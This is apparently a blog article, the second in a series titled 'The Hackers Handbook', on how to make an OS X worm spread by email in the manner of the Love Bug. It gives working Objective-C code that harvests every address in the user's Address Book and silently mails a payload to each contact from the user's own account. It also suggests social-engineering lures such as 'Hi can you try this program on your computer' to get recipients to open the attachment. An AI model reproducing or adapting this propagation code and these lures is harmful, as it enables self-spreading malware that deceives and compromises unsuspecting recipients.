The Hackers Handbook — Propagation

It's easy to write a nasty worm for OS X. Here's how. Second of many parts.

Get It Try It

The first article in this series discussed the ease with which worms can be propagated on OS X and highlighted two types of system flaws; this article will deal with propagation - with getting the worm to spread to other systems (at a geometric rate).

The Mother of All Methods

There are many methods of propagating a worm. Oompa Loompa used a limited one (and was limited further by running only on OS X 10.4 Tiger or better). For the purposes of this proof of concept exercise it's easiest to stick with the method used by the Mother of All Worms the Love Bug: mail.

The Love Bug attacked the Windows address book used by Outlook, sending out copies of itself to the first fifty contacts found; this worm, running on far faster hardware, need not limit itself at all in that regard.

Address Book

The contents of the mailing list maintained by the Address Book application are available programmatically. The following code snippet assembles all the contacts.

#import <AddressBook/AddressBook.h>

void assemble_contacts() {
    NSArray *people = [[ABAddressBook sharedAddressBook] people];
    NSMutableArray *contacts = [NSMutableArray array];
    id vfp;
    int i, j;

    for (i = [people count] - 1; i >= 0; i--)
        for (j = [(vfp = [[people objectAtIndex:i] valueForProperty:kABEmailProperty]) count] - 1;
                j >= 0; j--)
            [contacts addObject:[vfp valueAtIndex:j]];
}

NSMailDelivery

Once you have the contact list ready all you have to do is package yourself and start sending it out - propagation. Presuming the mutable array contacts is retained and still accessible the following code snippet sends the designated message out to all recipients.

#import <Message/NSMailDelivery.h>

void propagate(NSString *subject, NSArray *contacts, NSAttributedString *message) {
    NSMutableDictionary *headers = [NSMutableDictionary dictionary];
    int i;

    [headers setObject:subject forKey:@"Subject"];

    for (i = [contacts count] - 1; i >= 0; i--) {
        [headers setObject:[contacts objectAtIndex:i] forKey:@"To"];
        [NSMailDelivery deliverMessage:message headers:headers format:NSMIMEMailFormat protocol:0];
    }
}

Note the above SMTP activity takes place without being observed by the user. Only by watching CPU usage and the process list could the user possibly detect something is going on.

The method also assumes the sender address is going to be the user's default sender address which is perfect: the messages arrive in the inboxes of the recipients and appear to be sent by a 'trusted friend' - all the better chance they'll be opened.

This is the method the Love Bug used to propagate. In a few days it spread worldwide and caused $5.5 billion in damages.

Only one computer was originally compromised in the Love Bug attack - a single computer. But that computer then sent on the payload to fifty more computers. And each of those fifty computers sent on the payload to fifty more computers. And so forth.

The above code doesn't limit propagation to fifty contacts per computer - it takes them all. So propagation can be even faster and even more devastating.

Packing the Payload

The worm has to make a copy of itself and attach this copy to the message that's sent out. This is normally done by using the attributed string cited above. This is also left as an exercise for the reader (skiddie) so things aren't too easy.

What kind of payload is sent is a further consideration. The following method (Flash required) shows how it's done with MS Office exploits on Windows. Study of further MOAB bugs and use of Charlie Miller's 'method' can yield other profitable attack types.

Or you could just dump a Cocoa application with the payload hidden inside and come up with a plausible reason 'friends' will accept an application sent that way.

As for the 'social engineering' angle: yes a few people may be suspicious but the Love Bug showed that enough people click on things without thinking. The same will apply here. Maybe 'kindly open this love letter sent by me' might be a bit outdated today but something's bound to work. 'Hi can you try this program on your computer - it doesn't run on mine' might be better.

Whatever you decide on: enough people will fall for it (see what happened at MacRumors) to get propagation underway. After that there's no easy way of stopping it.

'TO BE CONTINUED'

See Also
Wooden Leg
Hacking the iPhone
'How I Hacked the iPhone'
iPhone
Alpine Dottie
Effective UID: 0
iPhone and Security
iPhone and the Media
iPhone Hack to be Patched
iPhone OS X System Architecture

Thanks to Devon at Pixel Groovy for the excellent artwork.